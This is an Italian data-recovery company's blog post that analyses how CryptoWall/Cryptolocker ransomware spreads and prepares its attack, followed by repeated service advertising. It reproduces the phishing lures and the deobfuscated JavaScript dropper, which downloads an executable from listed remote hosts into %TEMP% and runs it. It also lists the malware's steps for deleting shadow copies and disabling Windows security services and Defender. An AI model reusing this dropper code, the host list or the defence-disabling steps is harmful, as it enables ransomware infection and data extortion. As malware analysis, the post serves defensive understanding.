Virus CryptoWall come funziona il ransomware e come attacca i computer

I computer attaccati dal Virusl CryptoWall o Cryptolocker sono moltissimi i tutto il mondo, e la cosa imbarazzante è che è possibile trovare migliaia di forum di post sui blog con inutili informazioni scopiazzate senza alcuno che abbia perfezionato uno studio serio su questa piaga informatica, ma molto più grave è che nessuno sembra capire profondamente il significato di questo tipo di attacco nè viene intrapresa alcuna azione nè da enti governativi nè dai providers.

Come funziona il Virus Cryptolocker

Cryptolocker è un eseguibile, lanciato sul computer vittima con notevoli caratteristiche di protezione anti disassemblaggio e anti rilevazione che in un modo molto astuto, crypta i nostri files con una chiave molto forte ( attualmente sembra andare di moda RSA 2048 ) le informazioni contenute ni files considerati di "valore"per poi chiedere il riscatto ( RANSOM ) a pagamento per riavere i propri files.

Come si diffonde

Nella maggior parte dei casi il virus si propaga utilizzando messaggi di posta elettronica più o meno "intelligenti", come fattura, immagine o come accade in questi giorni spacciandosi per una comunicazione di equitalia molto ben costruita, diversa dal solito phishing di fattura grossolana.
Questo significa prima di tutto che componenti di questa organizzazione criminale sono italiani, e noi abbiamo anche trovato su quale server, ma lo vedremo più tardi
 

Esempio Lettera Equitalia

Agente della Risossione
Equitalia S.p.A.
Via Cristoforo Colombo 269 - 00117 - Roma

Art. 30 D.P.R. 21/05/1972, n. 202 e successive modifiche - Art. 30 D.P.R. 21/05/1972, n. 600, Art. 190 c.p.c.

Gentile Sig./Sig.ra,

Il suindicato Agente della Riscossione avvisa, ai sensi delle intestate disposizioni di legge , di aver depositato in data odierna, nella Casa Comunale del Comune il seguente avviso di pagamento "Documento n.00020405064" del 05/12/2015 , composto da 2 pagina/e di elenchi contribuenti a nr. 12 atti.

SCARICA IL DOCUMENTO ALLEGATO

Š Equitalia S.p.A. C.F. P.I. 08704541005

Esempio Email Copia della Fattura con allegato Fattura.zip

 

FROM:  Sofia Baritono
TO: 
Data: 06 11 2015 19:33:00
Subject: Copia della fattura

Come Vengono inviate le email infette

Le email con il virus, molto spesso provengono da indirizzi "reali" a volte da nostri stessi interlocutori e sono molto "credibili", questo perchè i nostri amici pirati che inviano le email con il virus hanno acquistato milioni di indirizzi email validi, direttamente nell botnet degli hackers, quindi è addirittura facile imbattersi in un mittente conosciuto.

Cosa contengono le email infette

Il ransomware cryptowall o cryptolocker non puo' diffondersi nativamente come .exe, in quanto i providers di posta lo identificherebbero, anche se contenuto in uno zip, per cui hanno pensato un sistema molto più articolato ed astuto.
Nel File fattura.zip per esempio spesso viene inserito un piccolo file javascript, linguaggio utilizzato dal nostro browser camuffato da pdf o da doc.
Il contenuto puo' avere delle piccole differenze, ma nella sostanza una funzione ricorsiva offuscata e maliziosa genera una stringa con il vero codice

Esempio del contenuto del file fattura.pdf.js

var stringa;

function F(YuesnpFPlX,sIqefaiTYA,iKJZjGxUCz)
{
    stringa = stringa + String.fromCharCode(YuesnpFPlX)+String.fromCharCode(sIqefaiTYA)+String.fromCharCode(iKJZjGxUCz);
    return String.fromCharCode(YuesnpFPlX)+String.fromCharCode(sIqefaiTYA)+String.fromCharCode(iKJZjGxUCz)
}

Attenzione alla chiamata Eval

La chiamata eval genera da un flusso complesso e apparentemente illeggibile il codice di secondo livello


eval(F(13,10,13)+F(10,118,97)+F(114,32,98)+F(32,61,32)+F(34,53,46)+F(51,57,46) + Molto altro codice dissimulatorio)

Risultato della trascodifica del Virus

Stringa delimitata con le URL del virus (73.exe in questo caso)


var b = "5.39.222.196/73.exe? bereanbibledenver.com/wp-admin/js/73.exe? bellychef.com/wp-includes/theme-compat/73.exe?".split(" ");

Con questo sistema il virus prova ad evitare eventuali rilevazioni del codice "malizioso"

var sdf =((1/*s147442280596n422484uM354193eOiZ*/)?"WScri":"")+"pt.Shell";

Qui è stata occultata la chiamata essenziale per lanciare il virus come eseguibile


var ws = WScript.CreateObject(sdf);
var fd = "%TEMP%";

Qui viene identificata la cartella di windows temporanea

var fn = ws.ExpandEnvironmentStrings(fd);

var bim = "2.XMLH";

var poh = bim + "TTP";

Qui viene cyptolocker occulta la chiamata http

var as = true  , sdfs = "ADOD";
var xo = WScript.CreateObject("MS"+"XML"+(261764, poh));
var xa = WScript.CreateObject(sdfs + "B.St"+(498822, "ream"));
var ld = 0;
var n = 1;

for (var i=ld; i

{

  var dn = 0;

  try  {

    poi = "GET";  

    Qui viene cyptolocker prova tutti gli indirizzi disponibili per il download del virus

    xo.open(poi,"http://"+b[i]+n, false); xo.send(); if (xo.status == 100+100)  {

      xa.open(); xa.type = 1; xa.write(xo.responseBody); if (xa.size > 201000-1000)  {

        dn = 1; xa.position = 0; xa.saveToFile/*d813530s*/(fn/*d41380s*/+n+".exe",4-2); try  {

          if (((new Date())>0,7327516888))

         {
            ws./*d608145s*/Run(fn+n+/*d246178s*/".exe",/*d104822s*/3-2,0);
            break;
          }
        }

        catch (er)  {

        };

      }; xa.close();

    };

    if (dn == 1)  {

      ld = i; break;

    };

  }

  catch (er)  {

  };

};

Cosa abbiamo notato nel comportamento del file fattura e del sistema di diffusione di Cryptowall

Prima di ogni cosa, i pirati che hanno prodotto il virus sono molto astuti e cambiano continuamente server e metodo di offuscamento delle url da dove il virus verrà scaricato.
I siti web che ospitano il virus, sono distruibuiti in tutto il mondo ed anche in italia.
Abbiamo notato che molti di questi siti vengono posizionati su providers e server in lingua araba, russa o posizionati a PANAMA per esempio.

Fanno parte dell'organizzazione anche Server Italiani

Durante le nostre analisi abbiamo trovato un redirect del virus anche su server italiani, nello specifico in Sardegna.
Non facciamo menzione del provider nè dei domini interessati, in quanto molto pericoloso e dobbiamo considerare l'ipotesi che il proprietario di un dominio attaccato potrebbe sempre essere inconsapevole, e quindi il pirata potrebbe essere il webmaster o qualcuno operante sui server del provider stesso, oltre che sarebbe opportuno considerare un eventuale attacco sul dominio in oggetto ( anche se l'ipotesi di hacking viene considerata remota ) .

Come funziona il Virus CryptoLocker

Una volta che l'eseguibile del virus è stato trasferito sul vostro computer il funzionamento del virus è molto veloce ed incisivo.
Il Virusl CryptoWall prima di iniziare il lavoro prepara con cura il proprio ambiente di utilizzo, creando un nuovo processo explorer sospeso ed inserisce codice malizioso nel processo stesso.
Crea dunque un nuovo thread remoto ed esegue la chiamata NtResumeThread
Il virus Perfeziona il downgrade del sistema di sicurezza di Windows ed esegue la patch su RtlQueryElevationFlags.

Cancellazione delle copie Shadow di Windows

Se ancora trovate qualche blogger improvvisato che nel proprio copia / incolla suggerisce di provare a recuperare i dati utilizzando le copie shadow, sappiate che CrytoWall prima di qualsiasi altra operazione le elimina con la chiamata WinExec( vssadmin.exe Delete Shadows /All /Quiet )

Disabilitazione dei seguenti servizi di sicurezza di Windows

Disabilitando questi servizi CryptoWall è certo di poter operare con tranquillità senza problemi, il Vostro sistema Windows adesso è completamente indifeso.

  1. Wscsvc
  2. WinDefend
  3. Wuauserv
  4. BITS
  5. ERSvc
  6. WerSvc

Cancellazione delle chavi di registro di Windows Defender

Il virus elimina la chiave per lo startup di Defender alla partenza del computer
HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Run.Windows Defender

Il virus elimina la chiave di registro per le notifiche di sicurezza
HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/ShellServiceObjects/{FD6905CE-952F-41F1-9A6F-135D9C6622CC}

e disabilita il ripristino di Windows per chiudere in bellezza
HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/SystemRestore.DisableSR = 1 

Il Virus CryptoWall è pronto a partire e a prendere in ostaggio i Vostri Dati

Nel prossimo post sul nostro blog vedremo come il Virus eseguirà il codice proncipale del proprio funzionamento, la cifratura dei Vostri Dati

Per qualsiasi informazione scriveteci virus@recoveritalia.it

Ti Potrebbe interessare:

recupero dati
Recovery Italia si occupa di procedure di recupero dati professionale da qualsiasi dispositivo di memoria, con qualsiasi sistema operativo. Grazie alle tecnologie e alle conoscenze sviluppate nell esperienza pluriennale, lo Staff puo intervenire e risolvere la stragrande maggioranza dei casi di perdita dati, per cancellazione, danneggiamento, formattazione o sabotaggio

Recupero dati da Hard Disk danneggiati
Recovery Italia puo intervenire per il recupero dati da hard disk danneggiati in qualsiasi caso come incendio, bagnato, bruciato, caduto, o perdita dati da formattazione accidentale o cancellazione file. Grazie alla Camera Bianca interviene con successo su danneggiamenti che implicano l apertura, come quelli meccanici, con trapianto gruppo testine o motore.

Recupero dati danneggiati da virus
Recovery Italia puo affrontare casi di recupero dati danneggiati da qualsiasi Virus e Malware. Interventi per il recupero dei dati attaccati da qualsiasi Virus, anche da memorie formattate in seguito all attacco del Virus. Possiamo recuperare dati criptati o codificati da Virus e Malware, dati bloccati, dati a cui e stata modificata l estensione e qualsiasi altra tipologia di attacco

La pagina originale del Ransomware
In questa pagina vi mostriamo la schermata originale del virus ACCDFISA 2.0

Recovery Italia, Contatti e sedi Operative

Recovery Italia garantisce una copertura logistica e commerciale su tutto il territorio italiano con i propri centri di roma,milano e torino oltre il servizio di copertura territoriale totale, supportato dal pick-up gratuito con corriere espresso DHL.

CONTATTI

Recovery Italia Virtual Tour

I centri di recupero dati, non sono tutti uguali. Dietro un sito web ben fatto non sempre ci sono aziende qualificate e che ti garantiscono risultati, qualità e sicurezza. Recovery Italia ha realizzato per voi il primo tour virtuale di un centro di data recovery in italia.

VIRTUAL TOUR

Procedura per il recupero dei dati

Scopri come funziona il recupero dati in Recovery Italia,come verranno gestite le tue informazioni personali, come verrá trattato il tuo dispositivo, dall’accettazione in laboratorio alla consegna dei file recuperati.

PROCEDURA

Richiedi una presa ed una diagnosi gratuita

Per poter valutare con precisione il livello di solvibilitá del tuo caso, è necessaria una accurata diagnosi di laboratorio con apparecchiature professionali.Recovery Italia ti offre un servizio di diagnosi e valutazione gratuita oltre un comodo servizio di presa con corriere espresso DHL.

PICKUP

Richiedi assistenza Tecnica

Hai un caso da sottoporci ? Richiedi assistenza tecnica direttamente al nostro staff tecnico. I nostri operatori sono preparati per consigliarti su come affrontare qualsiasi caso di perdita di dati.

ASSISTENZA

Preventivo ON LINE

Nessuno sembra riuscire ad esprimere un preventivo preciso o a fornirti una indicazione chiara dei costi ? Recovery Italia è la prima azienda italiana a fornirti un preventivo chiaro, semplice,definitivo e immediato.

PREVENTIVO

Recupero Dati Professionale da qualsiasi supporto

Recovery Italia si occupa di procedure di recupero dati professionale da qualsiasi dispositivo di memoria, con qualsiasi sistema operativo. Grazie alle tecnologie e alle conoscenze sviluppate nell es...

INFORMAZIONI

Recupero dati da Hard Disk danneggiati

Recovery Italia puo intervenire per il recupero dati da hard disk danneggiati in qualsiasi caso come incendio, bagnato, bruciato, caduto, o perdita dati da formattazione accidentale o cancellazione fi...

INFORMAZIONI

Recupero dati danneggiati da virus

Recovery Italia puo affrontare casi di recupero dati danneggiati da qualsiasi Virus e Malware. Interventi per il recupero dei dati attaccati da qualsiasi Virus, anche da memorie formattate in seguito...

INFORMAZIONI

La pagina originale del Ransomware

In questa pagina vi mostriamo la schermata originale del virus ACCDFISA 2.0

INFORMAZIONI

Ti Potrebbe interessare:

recupero dati
Recovery Italia si occupa di procedure di recupero dati professionale da qualsiasi dispositivo di memoria, con qualsiasi sistema operativo. Grazie alle tecnologie e alle conoscenze sviluppate nell esperienza pluriennale, lo Staff puo intervenire e risolvere la stragrande maggioranza dei casi di perdita dati, per cancellazione, danneggiamento, formattazione o sabotaggio

Recupero dati da Hard Disk danneggiati
Recovery Italia puo intervenire per il recupero dati da hard disk danneggiati in qualsiasi caso come incendio, bagnato, bruciato, caduto, o perdita dati da formattazione accidentale o cancellazione file. Grazie alla Camera Bianca interviene con successo su danneggiamenti che implicano l apertura, come quelli meccanici, con trapianto gruppo testine o motore.

Recupero dati danneggiati da virus
Recovery Italia puo affrontare casi di recupero dati danneggiati da qualsiasi Virus e Malware. Interventi per il recupero dei dati attaccati da qualsiasi Virus, anche da memorie formattate in seguito all attacco del Virus. Possiamo recuperare dati criptati o codificati da Virus e Malware, dati bloccati, dati a cui e stata modificata l estensione e qualsiasi altra tipologia di attacco

La pagina originale del Ransomware
In questa pagina vi mostriamo la schermata originale del virus ACCDFISA 2.0